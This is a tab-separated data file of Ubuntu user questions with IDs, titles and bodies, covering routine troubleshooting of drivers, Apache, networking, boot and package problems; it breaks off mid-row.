248852	change bootloader title to include bit	secondlife runs on 32 bit linux . i 've tried wine , crossover , and installing the 32 bit libraries . nothing has worked so now i 'm having to install a 32 bit copy of ubuntu as a second partition just to play a game that has linux support already . anywho , how do i set the bootloader up to tell me whether i 'm running ubuntu 32 or 64 at boot ?
248853	graphical authentication works ; why does sudo say my password is wrong ?	i 'm trying to install a theme , and when i enter the command sudo cp -r $ home/desktop/overglossed /usr/share/themes the terminal asked for my sudo password which i entered , however i 'm told my password is wrong . what is the problem here ? i logged in with the same password , and i do n't have cap lock on or anything like that . this is the first time i have used the terminal , so if this is due to my unfamiliarity with it , please let me know . i am not always prevented from performing administrative tasks by entering my password . i can install software in the software center , for example i installed chrome ( which i have used to work on this question ) .
248859	rhythmbox was erased after update and cant reinstall	i tried to update my rhythmbox when all of a sudden i realized it was removed from my system . i tried installing it again but i keep getting a messages for unmet dependencies . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : rhythmbox : depends : libmusicbrainz4-3 but it is not installable recommends : rhythmbox-mozilla but it is not going to be installed recommends : rhythmbox-plugin-cdrecorder but it is not going to be installed recommends : rhythmbox-plugin-zeitgeist but it is not going to be installed recommends : rhythmbox-plugins but it is not going to be installed and the following packages have unmet dependencies : rhythmbox : depends : libgtk-3-0 ( > = 3.2.0 ) but 3.6.0-0ubuntu3.2 is to be installed depends : libmusicbrainz4-3 but it is not going to be installed depends : librhythmbox-core6 ( = 2.98.really.2.97-1ubuntu6.1~precise1 ) but 2.98.really.2.97-1ubuntu6.1~precise1 is to be installed depends : rhythmbox-data ( = 2.98.really.2.97-1ubuntu6.1~precise1 ) but 2.98.really.2.97-1ubuntu6.1~precise1 is to be installed depends : gir1.2-rb-3.0 ( = 2.98.really.2.97-1ubuntu6.1~precise1 ) but 2.98.really.2.97-1ubuntu6.1~precise1 is to be installed
248863	unbuntu , how do i make 'make ' command work ?	i am trying `` linux kernel module programming - compiling the module `` as in this youtube video . first i created a hello.c program . as a second step need to type command # gedit makefile . it opens a window which is empty in gedit . i tried to copy the same commands but running make command its showed error : make : *** no rule to make target 'make ' , needed by 'all ' . stop . searching some ubuntu forms i tried : sudo apt-get install build essentials sudo apt-get install make sudo apt-get install autoconf automake every time i executed this command some packages got installed . i went and checked in : root @ unbuntu : /lib/modules/3.5.0-17-generic/build i can see 'makefile ' when typed ls command , but still i have the same problem make command is not still working as gedit makefile command open a blank editor . any help is greatly appreciated .
248864	blank screen upon boot after installing nvidia drivers . 12.10	i tried to install nvidia drivers on my most recent install of 12.10 . now it no longer boots to the shell . it will only display a blank screen with the cursor flashing , but you will be unable to type . the video card is a gforce 9800 gt is there anyway to revert to the original display drivers ? or is the a way to fix the nvidia drivers ? or is my only option to try and re-install the os ? i admit i 'm new to this . i have tried everything from blank screen after installing nvidia restricted driver and nothing fixes it , it still boots to a blank screen .
248867	intel® xeon ( tm ) cpu 2.80ghz × 4	what version of ubuntu server should i use on a hp g3 server with intel® xeon ( tm ) cpu ? 2.80ghz × 4
248868	building android filesystem	while building android filesystem , i am getting an error as you are attempting to build with the incorrect version of javac . your version is : javac 1.7.0_12-ea . the correct version is : 1.6 . please follow the machine setup instructions at http : //source.android.com/source/download.html but i am having the version of 1.6 only . $ java -version java version `` 1.6.0_26 '' java ( tm ) se runtime environment ( build 1.6.0_26-b03 ) java hotspot ( tm ) 64-bit server vm ( build 20.1-b02 , mixed mode ) actually i was having java 1.7 , then after seeing this error i just installed java 1.6 amd removed java 1.7. but till now it is pointing to java 1.7 . what will i do hereafter ? please guide me . thank u in advance .
248869	data lost on upgrade to 12.04	i have upgraded to ubuntu 12.04 & lost visual data on the calender pages of korganizer , although contact data is all there . any help please ?
248870	laptop brightness keys have a delayed effect or none	my laptop is a gateway nv52l03h , amd radeon hd 7520g using the amd fglrx drivers . most of my laptop 's fn ( function ) keys are working properly and as they should . the only one misbehaving are the brightness keys . when i change the brightness , it either does n't work , or changes the brightness a few seconds later . i end up having to keep playing with the brightness keys for it to change . i always receive a notification on screen , even though the brightness usually does n't change . how can i fix my brightness keys ?
248871	when i 'm on the desktop and i type anything a small window opens . what is it ?	when i 'm on the desktop of ubuntu , i type something and it appears in a small window in the lower right corner of the screen . what is that and how does it work ?
248872	localhost not working ( apache2 , ubuntu12.04 ) . but showing `` it works '' page	i am running apache2 on ubuntu linux . i dont know what is the reason but unable to access my localsite which is placed on var/www/xyz . xyz is the site root folder here . when i try only localhost it is showing `` it works '' . but if i try with the site like localhost/xyz.it is showing the following error . it was worked fine till yesterday , but today i got this problem . not found the requested url was not found on this server . could anybody please help me in this regard . i tried restarting i got this error sudo /etc/init.d/apache2 restart * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 98 ) address already in use : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . thanks in advance
248873	why ca n't we just use diskutil app for step 8 bootable usb mac style	after converting the file from iso to dmg why ca n't we use diskutil app to transfer the file to the usb . because i am having problems . it is saying that my file does not exist but i see it right there on my desktop . why ca n't just drag it to diskutil and burn it . this is alot of work
248874	squid3 pam_auth authentication not working	i 'm attempting to run a squid3 proxy server with authentication for any user that has a login to the server . i 've followed these instructions , and i am prompted for a username and password when i enter the proxy details . problem is it wo n't accept my root username and password or another account that i have . i am sure i 'm entering the password correctly . i checked the log and i see : 1359436167.010 1281 174.xx.xx.xx tcp_denied/407 5219 get http : //abechik.wordpress.com/2008/12/26/ubuntu-810-squid3-with-pam_auth-revisited/ root none/- text/html any ideas ? edit : config file here : http : //paste.ubuntu.com/1603430/ i pretty much followed the instructions on this blog . also just to ensure i understand this right : i have a local user 'bomez ' with password 'password ' . i can log into the system via putty over ssh . when firefox i am prompted for the password i enter bomez and password and it just asks for the password again . i 'd like to be able to just make linux user accounts which will automatically have proxy access .
248875	how do i extend the desktop to the third monitor using a displaylink usb-to-vga adapter ?	i have a displaylink usb-to-vga adapter ( 17e9:0198 newnham research ) i would like to add to my system ( eventually two ) . i am running linux 3.5.0-19-generic # 30~precise1-ubuntu smp wed nov 14 21:43:28 utc 2012 i686 i686 i386 gnu/linux and ubuntu 12.04.1 lts . i have an asus g74sx with the main screen and a second monitor on the vga port . the displaylink-connected monitor shows green unless i hit ctrl-alt-f1 in which case the other two monitors go blank and a login screen appears on the monitor connected to the displaylink . i can login and have a text-mode display . what i really would like is to extend the desktop to the third monitor . can anyone help ?
248878	how to configure preferred network for internet ?	i am connected to a lan network and wireless network . both provide access to internet . sometimes when the internet on lan is not working , the browser simply throws an exception instead of switching to wireless . ( wireless is on and local peer computers on wireless are connectible ) . apparently it is giving more priority to lan . how do i increase the priority of wireless or set it as an automatic fall back ?
248879	projector is not detecting in ubuntu desktop	i 'm using epson eb-s9 projector and it is connecting using usb cable to the ubuntu system , but the problem is , projector is not detecting by the system , following is some information regarding the my system . lspci | grep vga output is : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) sudo lshw -c video output is : *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fe000000-fe3fffff memory : d0000000-dfffffff ioport : f160 ( size=8 ) i 'm thinking that , necessary drivers might be missing , how to install those ?
248881	executing a .sh and ending in a different directory	i know there is a simple command for this , but i 'm trying to run a file.sh , which contains lines like : mkdir $ filename cd $ filename the file executes , but ends in the file i began in . i know there is a simple keyword to put in front to make the execution leave me in the directory $ filename , but i cant find it on the internet . i found it once before , but cant seem to do it again .
248883	apache2 restart error . how to resolve this	running apachectl -k restart gives : /usr/sbin/apachectl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername httpd not running , trying to start ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action '-k restart ' failed . the apache error log may have more information . this is what i am getting while restarting the server . how can i fix this ?
248884	buffer i/o error on device sda1 , logical block 4684514	i 'm trying to format a hard drive . i 've used mkfs.ntfs /dev/sda1 after the fdisk command , but mkfs does n't work ! and when i press ctrl+alt+f6 i see this message : buffer i/o error on device sda1 , logical block 4684514 have i lost my hard drive ? if not , what should i do ?
248887	private storage cloud	i 'm absolute new to this area . so , please be gentle : - ) i 'm looking at the possibility for my company to start a private storage cloud using cheap hardware and software . for example , sata storage boxes , assembled servers , and open source and free software . our company is into very specific business with particular set of clients . we want to offer them the possibility of digital archiving of their files and other information . where do i need to start to setup a pilot setup to show the strength of cloud compared to direct access to storage over the internet . i 'm expecting to show automatic sizing , redundancy , virtualization , security , accessibility etc . please guide me to a starting point .
248895	when i update ubuntu 12.04 i got following error	w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found
248896	how to set up internet connection sharing ?	i have installed ubuntu 12.04 lts . now , i want internet connection sharing between the two lan cards . how can i accomplish this ?
248899	does enabling acls have an effect on performance ?	i 'm looking at a web application that needs acls enabled . are there any benchmarks or other documents to show what potential impact acl does { n't } have when the file system is under heavy load ? also , does it matter what filesystem you use with acls ?
248900	very high cpu usage on hp dv7 laptop when idle	i 'm pretty new to linux computing . so i finally thought of giving ubuntu a try , by dualbooting it with windows 8 on my hp dv7-6006tx laptop . laptop specs but after installation , i immediately realised that the fan of the laptop is spinning very hard and there 's a considerable amount of heat underneath , when the laptop was on idle , ie nothing running . - this rarely occurs when running windows ( unless i 'm rendering or encoding movies ) . so i 'm not sure if this is maybe an incompatibility issue , or if i just need the latest driver software and that things ? what also concerned me was how quickly it drained my battery . it did n't even last 30mins , where i can use it for over 2 hours on windows . please advice me , as despite of this issue , i 'm really enjoying ubuntu and would love to make further use of it ! : - ) thanks !
248901	how do i delete photo albums from my ubuntu one ?	i recently discovered ubuntu one photos . but i do n't like how many photos were uploaded without me knowing . there are for instance a bunch of junk albums on there with junk folders . how can i remove these photo albums from ubuntu one ?
248904	how to color each new command in terminal ?	as i am running commands in the terminal , some times when the resulted log is larg , i get lost looking for the command line it self . and some times when i need to distinguish between logs of the previous command and logs of the command after .. so , what 's the recommended way to solve this issue ? i thought about colors , but , i have no idea what to do or how to configure the terminal ? is there another terminal which support colors , bold , or may be italic .. ? ?
248906	how can i free space on a ubuntu usb drive ?	i 'm very new in the ubuntu family ( i downloaded ubuntu 12.04 lts , just 2 days ago , i must learn linux for college ) . second of all , english is not my native language , but i 'll try to be as clear as possible ) . i installed ubuntu on a 1 gb flash drive using universal usb installer , following the instructions on the ubuntu.com . it worked just fine . so i started using the terminal , to learn about commands , and i edited a text file , a few times , and after a few hours when i tried to save the text file again it displayed me the `` low disk space .. '' message . i think it also stored the firefox history/cache . anyway , my question is , how can i clear the space ? side note : while using universal usb , it asked me for the size of persistent folders ( or something like that ) and i specified 200 mb , thinking that this is for file storage . have i done good ? or wrong ?
248911	ubuntu server : ca n't access apache hosted pages after changing ip	i moved my server to a different office . since they wanted to access it , i joined their network by changing my server 's ip . the server hosts lamp + postgres . now i ca n't get the basic web apps to run . even pgadmin from my pc to the server wo n't run . it 's all on a lan ? what could be the issue ? eg : /phppgadmin wo n't work . not even that index.html that shows 'it works ' . more info : i just realised this ... when i turn off my firewall with ufw disable i have no problem . how can i now allow this to work with the firewall on ? i remember allowing port 22 but it does n't seem to have an effect . maybe something i 'm doing wrong .
248914	what is hardware enablement ( hwe ) ?	i see the linux-hwe-generic package as part of the kernels you can install in ubuntu 12.04 . what is hardware enablement ( hwe ) ?
248915	is possible to install ubuntu 12.04 or 12.10 on acer v5-571-53314g50 ultrabook ?	is possible to install ubuntu 12.04 or 12.10 on acer v5-571-53314g50 ultrabook ? my specifications are : display : 15.6 '' 1.366 x 768 wxga hd ; led , acer cinecrystal™ cpu : intel® core™ i5-3317u , 2cores , 1.7ghz , turbo @ 2.6ghz , 22nm ; 3mb intel® smart cache ; hyper-threading ; ivy bridge chipset : intel® hm77 express ultra thin and light design memory : 4gb ddr3 hdd : 500gb sata vga : nvidia® geforce® gt 620m 1gb ddr3 + intel hd graohics 4000 odd : dvd±rw super multi dual layer wifi : acer invilink™ nplify™ , ieee 802.11a/g/n ; wi-fi bluetooth 4,0 network adapter : 10/100/1000mbps ports : hdmi , vga , usb 3.0 x 1 , usb 2.0 x2 card reader 2in1 camera : acer crystal eye hd 1.3mp 720p speakers : 2.0 dolby® advanced audio® v2 surround ; high definition os : linux linpus™
248916	is there a gnome applet similar to the windows 7 dock with ungroup option ?	i 'm looking for taskbar that works similar to the one found in win7 and it 's not unity : ) dockbarx is very close to what i 'm looking for but it does not have ungroup option . is there any gnome applet ( or something ? ) that works like dockbarx but has the ungroup option ? edit how does win7 taskbar works : all open windows are presented as icons . you can add title to these icons but there is no text in default view , just icons - which is fine . you can pin those programs so that they stay on the taskbar even if you close the program . if the program is pinned it behaves like a placeholder for itself . for example if you would like to open firefox , you just lick on the firefox icon and then it brings the current instance of firefox program or run a new instance if firefox is not running . so if i click on the icon , the program is brought back ( if it 's running ) or it 's executed ( if it 's not running ) . dockbarx works exactly like that except it can not ungroup windows . nowadays in the age of webapps lack of this functionality is very big disadvantage . for example i have always opened chrome browser and gmail app ( as a chrome app opened on gmail.com ) and many other webapps as a chrome apps ( command : chrome -- app=http : //www.example.com ) . dockbarx groups them all into one icon because all of those are chrome instances . the author of dockbarx stated plainly that `` ungroup '' functionality will never be implemented in dockbarx so i ask if there is any gnome applet that works just like dockbarx but has ungroup option .
248924	linking cpp object file to c object file and create executable	suppose i have a c++ file , created an object file and c file created another object file . now i need to link both into one executable . while i 'm trying it is giving errors about c++ not found . can anyone help me about that . thanks in advance .
248926	help with webcam ubuntu 12.10	i have a dell latitude e6520 laptop with integrated webcam and ubuntu 12.10 64 bit . i had my webcamera up and running . for some reason , i purged cheese and luvcview . now , when i reinstall , i 'm not able to see my video . the webcam is not working . my webcam is detected by lsusb . the purging removed some config files i guess . can some one help me in this regard
248928	unable to access internet on ubuntu 12.04	i have recently installed ubuntu 12.04 . i am now unable to access internet ( wired ) . i tried things like renewing the ip address , etc . but that did not seem to work . it recognizes whether the lan cable is plugged in or not but , still i can not access the internet . any help would be appreciated . here are the outputs for the commands : $ ifconfig eth0 link encap : ethernet hwaddr 00:0f : fe:59:71:3e inet6 addr : fe80 : :20f : feff : fe59:713e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1682 errors:0 dropped:0 overruns:0 frame:0 tx packets:389 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:139639 ( 139.6 kb ) tx bytes:102684 ( 102.6 kb ) interrupt:19 memory : f0400000-f0420000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2688 errors:0 dropped:0 overruns:0 frame:0 tx packets:2688 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:219840 ( 219.8 kb ) tx bytes:219840 ( 219.8 kb ) $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface $ lspci -nnk | grep -iea3 `` ( network|ethernet ) '' 00:19.0 ethernet controller [ 0200 ] : intel corporation 82566dm gigabit network connection [ 8086:104a ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:2800 ] kernel driver in use : e1000e kernel modules : e1000e
248932	how to play shoutcast radios in deadbeef audio player ?	how to open shoutcast radios in deadbeef ?
248937	logitech mouse and keyboard on same receiver sometimes not recognized - hard restart necessary	i have mouse logitech m505 and keyboard logitech k340 on same usb wireless receiver . my ubuntu is up to date . problem is that sometimes ubuntu does n't recognize devices - lately very often . i seat in front of my login screen and i ca n't do anything . even blinking cursor stops in welcome password field . mostly hard reset is a rescue . sometimes helps when i unplug logitech usb reciver and plug it again , wait about 2 minutes and try to hit some buttons on my keyboard . then there is a chance to back to live those two devices . in my windows 7 everything is all right . system : linux version 3.5.0-22-generic ( buildd @ komainu ) ( gcc version 4.7.2 ( ubuntu/linaro 4.7.2-2ubuntu1 ) ) # 34-ubuntu smp tue jan 8 21:47:00 utc 2013 cpu : amd phenom ( tm ) ii x6 1100t syslog when i plug receiver again : jan 29 10:55:41 maraspc kernel : [ 47.957167 ] usb 3-2 : device descriptor read/64 , error -110 jan 29 10:55:56 maraspc kernel : [ 63.129217 ] usb 3-2 : device descriptor read/64 , error -110 jan 29 10:55:56 maraspc kernel : [ 63.344590 ] usb 3-2 : new high-speed usb device number 5 using ehci_hcd jan 29 10:56:01 maraspc kernel : [ 68.350208 ] usb 3-2 : device descriptor read/8 , error -110 jan 29 10:56:07 maraspc kernel : [ 73.455350 ] usb 3-2 : device descriptor read/8 , error -110 jan 29 10:56:07 maraspc kernel : [ 73.670676 ] usb 3-2 : new high-speed usb device number 6 using ehci_hcd jan 29 10:56:12 maraspc kernel : [ 78.676325 ] usb 3-2 : device descriptor read/8 , error -110 jan 29 10:56:17 maraspc kernel : [ 83.781466 ] usb 3-2 : device descriptor read/8 , error -110 jan 29 10:56:17 maraspc kernel : [ 83.885163 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 jan 29 10:56:18 maraspc kernel : [ 84.399657 ] usb 4-4 : new full-speed usb device number 2 using ohci_hcd jan 29 10:56:18 maraspc kernel : [ 84.572237 ] usb 4-4 : new usb device found , idvendor=046d , idproduct=c52b jan 29 10:56:18 maraspc kernel : [ 84.572248 ] usb 4-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jan 29 10:56:18 maraspc kernel : [ 84.572255 ] usb 4-4 : product : usb receiver jan 29 10:56:18 maraspc kernel : [ 84.572261 ] usb 4-4 : manufacturer : logitech jan 29 10:56:18 maraspc mtp-probe : checking bus 4 , device 2 : `` /sys/devices/pci0000:00/0000:00:12.0/usb4/4-4 '' jan 29 10:56:18 maraspc mtp-probe : bus : 4 , device : 2 was not an mtp device jan 29 10:56:18 maraspc kernel : [ 84.641141 ] usbcore : registered new interface driver usbhid jan 29 10:56:18 maraspc kernel : [ 84.641148 ] usbhid : usb hid core driver jan 29 10:56:18 maraspc kernel : [ 84.654283 ] logitech-djreceiver 0003:046d : c52b.0003 : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:12.0-4/input2 jan 29 10:56:18 maraspc kernel : [ 84.660522 ] input : logitech unifying device . wireless pid:2007 as /devices/pci0000:00/0000:00:12.0/usb4/4-4/4-4:1.2/0003:046d : c52b.0003/input/input11 jan 29 10:56:18 maraspc kernel : [ 84.660761 ] logitech-djdevice 0003:046d : c52b.0004 : input , hidraw1 : usb hid v1.11 keyboard [ logitech unifying device . wireless pid:2007 ] on usb-0000:00:12.0-4:1 jan 29 10:56:18 maraspc kernel : [ 84.661595 ] input : logitech unifying device . wireless pid:101d as /devices/pci0000:00/0000:00:12.0/usb4/4-4/4-4:1.2/0003:046d : c52b.0003/input/input12 jan 29 10:56:18 maraspc kernel : [ 84.662046 ] logitech-djdevice 0003:046d : c52b.0005 : input , hidraw2 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:101d ] on usb-0000:00:12.0-4:2 jan 29 10:56:18 maraspc kernel : [ 84.838379 ] usb 7-2 : new full-speed usb device number 2 using ohci_hcd jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : successfully made thread 2228 of process 2228 ( n/a ) owned by '1000 ' high priority at nice level -11 . jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : supervising 5 threads of 2 processes of 2 users . jan 29 10:56:29 maraspc dbus [ 848 ] : [ system ] activating service name='org.freedesktop.udisks2 ' ( using servicehelper ) jan 29 10:56:29 maraspc udisksd [ 2236 ] : udisks daemon version 2.0.0 starting jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : successfully made thread 2241 of process 2228 ( n/a ) owned by '1000 ' rt at priority 5 . jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : supervising 6 threads of 2 processes of 2 users . jan 29 10:56:29 maraspc dbus [ 848 ] : [ system ] successfully activated service 'org.freedesktop.udisks2' jan 29 10:56:29 maraspc udisksd [ 2236 ] : acquired the name org.freedesktop.udisks2 on the system message bus jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : successfully made thread 2262 of process 2228 ( n/a ) owned by '1000 ' rt at priority 5 . jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : supervising 7 threads of 2 processes of 2 users . jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : successfully made thread 2263 of process 2228 ( n/a ) owned by '1000 ' rt at priority 5 . jan 29 10:56:29 maraspc rtkit-daemon [ 1745 ] : supervising 8 threads of 2 processes of 2 users . jan 29 10:56:31 maraspc goa [ 2385 ] : goa-daemon version 3.6.0 starting [ main.c:112 , main ( ) ] jan 29 10:56:33 maraspc kernel : [ 99.930587 ] usb 7-2 : device descriptor read/64 , error -110 jan 29 10:56:48 maraspc kernel : [ 115.126635 ] usb 7-2 : device descriptor read/64 , error -110 jan 29 10:56:49 maraspc kernel : [ 115.365908 ] usb 7-2 : new full-speed usb device number 3 using ohci_hcd jan 29 10:57:04 maraspc kernel : [ 130.458223 ] usb 7-2 : device descriptor read/64 , error -110 jan 29 10:57:19 maraspc kernel : [ 145.654204 ] usb 7-2 : device descriptor read/64 , error -110 jan 29 10:57:19 maraspc kernel : [ 145.893523 ] usb 7-2 : new full-speed usb device number 4 using ohci_hcd jan 29 10:57:24 maraspc kernel : [ 150.899131 ] usb 7-2 : device descriptor read/8 , error -110 jan 29 10:57:29 maraspc kernel : [ 156.004348 ] usb 7-2 : device descriptor read/8 , error -110 jan 29 10:57:30 maraspc kernel : [ 156.243534 ] usb 7-2 : new full-speed usb device number 5 using ohci_hcd jan 29 10:57:32 maraspc dbus [ 848 ] : [ system ] activating service name='com.ubuntu.systemservice ' ( using servicehelper ) jan 29 10:57:32 maraspc dbus [ 848 ] : [ system ] successfully activated service 'com.ubuntu.systemservice' jan 29 10:57:35 maraspc kernel : [ 161.249161 ] usb 7-2 : device descriptor read/8 , error -110 jan 29 10:57:40 maraspc kernel : [ 166.354371 ] usb 7-2 : device descriptor read/8 , error -110 jan 29 10:57:40 maraspc kernel : [ 166.457958 ] hub 7-0:1.0 : unable to enumerate usb device on port 2
248938	alt+f2 does n't display the run command prompt in gnome shell	i have ubuntu 12.04 lts amd64 and gnome shell 3.4.1 and for some reason the alt+f2 keys stopped displaying the run command prompt when pressed . now , i 've seen the other answers that point you to setting the keys in the all settings > keyboard > shortcuts and the gnome compatibility in the compizconfig settings manager and they are all set . still , the alt+f1 properly displays the activites , but the alt+f2 just does n't work ( or it works , but the prompt does n't display ) . i 've created a new account named test and it works ok in that one . how can i reset the gnome shell to work properly w/o recreating the user ? edit 1 : not even copying the .gconf and .local directories ( and changing ownership ) from the test home directory to mine worked . so it might be a problem of the shortcut keys working , but the prompt not showing . edit 2 : when pressing alt+f2 the following shows up in the ~/.xsession-errors file js error : ! ! ! exception was : error : error invoking gio.monitor_directory : unable to find default local directory monitor type js error : ! ! ! linenumber = '0' js error : ! ! ! filename = ' '' gjs_throw '' ' js error : ! ! ! stack = ' '' ( `` error invoking gio.monitor_directory : unable to find default local directory monitor type '' ) @ gjs_throw:0 ( ) @ /usr/share/gnome-shell/js/ui/rundialog.js:60 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 ( ) @ /usr/share/gjs-1.0/lang.js:145 ( ) @ /usr/share/gjs-1.0/lang.js:239 ( ) @ /usr/share/gnome-shell/js/ui/rundialog.js:238 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 ( ) @ /usr/share/gjs-1.0/lang.js:145 ( ) @ /usr/share/gjs-1.0/lang.js:239 getrundialog ( ) @ /usr/share/gnome-shell/js/ui/main.js:799 ( [ object _private_meta_display ] , [ object _private_meta_screen ] , null , [ object _private_meta_keybinding ] ) @ /usr/share/gnome-shell/js/ui/main.js:140 '' ' js error : ! ! ! message = ' '' error invoking gio.monitor_directory : unable to find default local directory monitor type '' '
248944	how to disable trash for remote filesystems in nautilus ?	is there a way to tell nautilus ( or gvfs ) to avoid using the trash when deleting files on remote filesystems ? before nautilus 2.5.0 there was a filesystem-attributes.xml that had a `` trash '' flag , but it was removed with the migration to gnome-vfs
248947	troubles in connecting second monitor to geforce gt440	i have ubuntu 12.04 64-bit , geforce gt440 , 2 19 '' vga monitors with 1280x1024 support . installed proprietary nvidia drivers . % nvidia-xconfig -v nvidia-xconfig : version 304.43 ( buildmeister @ swio-display-x86-rhel47-13 ) sun aug 19 21:19:28 pdt 2012 the nvidia x configuration tool . this program is used to manipulate x configuration files , specifically to enable nvidia x driver functionality . copyright ( c ) 2005 - 2010 nvidia corporation . now i try to connect the second monitor to videocard via vga-dvi adapter . it connects only with resolutoin 640x480 . monitor is correct : it displays 1280x1024 when connected to vga directly . adapted is correct : tested on windows machine , it accept 1280x1024 . as i understand , i have troubles in my x11 settings . here is my xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.43 ( buildmeister @ swio-display-x86-rhel47-13 ) sun aug 19 21:19:28 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 440 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection any help will be appreciated . i 've spent a lot of time trying to run it with normal resolution .
248953	can i use an older version of libreoffice ?	quantal has 3.6 . i feel that the new version is heavier - at least for my specs . ( beside having this problem ) . how could i install an older version of libreoffice ?
248954	mythtv in dmesg though it is not installed	dmesg shows stranges massages . last year i tried mythtv but it did n't work for me and thus i removed it again . today i saw that dmesg shows this messages : [ 16.047679 ] init : mythtv-backend main process ( 2489 ) terminated with status 127 [ 16.047707 ] init : mythtv-backend main process ended , respawning [ 16.060100 ] init : mythtv-backend main process ( 2503 ) terminated with status 127 [ 16.060124 ] init : mythtv-backend main process ended , respawning [ 16.071027 ] init : mythtv-backend main process ( 2514 ) terminated with status 127 [ 16.071061 ] init : mythtv-backend respawning too fast , stopped but mythtv is definitely not installed ~ $ dpkg -- get-selections | grep mythtv mythtv-backend deinstall mythtv-common deinstall mythtv-database deinstall mythtv-frontend deinstall mythtv-transcode-utils deinstall this post seems to solve a similar problem ( with juju instead of mythtv ) . obviously the corresponding remedy would be to delete /etc/init/mythtv-backend.conf can i do so safely ? is there anything else i can/should do ( maybe similar to running stop juju-jon-sample-file-storage in the previous mentioned post ) ?
248959	uninstall metasploit problem	i had serious problems with metaploit since i installed it , so i want to uninstall it i did try /opt/metasploit-4.5.0/uninstall but it does n't work it shows a yes and no .. i choose yes then wait some seconds another window opens for 0.01sec then closes and it types killed in the terminal
248960	installing ubuntu in a predefined partition	my 500 gb hdd has 5 partition . 4 among of them are of ntfs file system and partially occupied with data . another partition where i want to install ubuntu is of 52 gb . now i want to know in which file system i have to format that particular partition to install ubuntu . please provide the link or step by step procedure of such type installing keeping in mind that i can not resize/move/shrink my ntfs partion at present as i have to recover some deleted files from that partition - however i will do the same later . thanks in advance .
248962	wifi on hp envy sleekbook 6-111nr not working	i purchased a hp sleekbook with windows 8 , enabled legacy os in bios and installed ubuntu 12.10 . i can not get the wireless to work . here is my hardware list from hp.com product name 6-1111nr product number c2k94ua microprocessor 2.1ghz up to 2.6ghz amd a6-4455m accelerated processor microprocessor cache 1mb l2 cache memory 4gb ddr3 sdram ( 1 dimm ) memory max maximum supported = 16gb memory slots 2 user accessible video graphics amd radeon hd 7500g discrete-class graphics and up to 2036mb total graphics memory display 15.6-inch diagonal hd brightview led-backlit display ( 1366x768 ) hard drive 500gb 5400rpm hard drive with hp protectsmart hard drive protection network card 10/100/1000 gigabit ethernet lan ( rj-45 connector ) wireless connectivity 802.11b/g/n wlan bluetooth sound beats audio dual speakers and a subwoofer keyboard full-size island-style keyboard pointing device hp imagepad supporting multi-touch gestures with on/off button . external ports multi-format digital media card reader for secure digital cards and multimedia cards 2 superspeed usb 3.0 1 universal serial bus ( usb ) 2.0 1 hdmi 1 rj-45 ( lan ) 1 headphone 1 microphone in dimensions 14.72 in ( w ) x 9.95 in ( d ) x 0.78 in ( h ) weight 4.53 lb power 65w ac adapter 4-cell 60whr 4.1 ah lithium-ion polymer battery id mech description hp truevision hd webcam with integrated dual array digital microphone iwconfig : eth0 no wireless extensions . lo no wireless extensions . lsmod : module size used by rfcomm 46620 0 bnep 18141 2 bluetooth 209249 10 rfcomm , bnep parport_pc 32689 0 ppdev 17074 0 snd_hda_codec_idt 70210 1 snd_hda_codec_hdmi 32049 1 snd_hda_intel 33492 5 snd_hda_codec 134213 3 snd_hda_codec_idt , 